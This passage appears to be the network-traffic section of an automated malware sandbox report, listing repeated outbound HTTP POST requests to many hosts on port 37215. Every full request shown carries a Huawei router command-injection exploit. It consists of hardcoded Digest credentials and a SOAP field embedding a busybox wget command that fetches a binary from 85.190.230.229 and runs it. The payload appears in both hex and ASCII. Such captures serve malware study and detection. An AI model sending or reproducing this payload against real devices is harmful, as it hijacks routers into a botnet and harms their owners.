2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:08.394161940 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:12.425860882 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:20.361635923 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:36.233041048 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:18:08.999505997 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      38192.168.2.145371241.35.249.24837215
                                                                      TimestampBytes transferredDirectionData
                                                                      Aug 2, 2024 13:17:04.568655014 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      39192.168.2.145183241.248.64.16637215
                                                                      TimestampBytes transferredDirectionData
                                                                      Aug 2, 2024 13:17:04.570029020 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:04.914190054 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:05.418196917 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:06.410089970 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:08.394018888 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
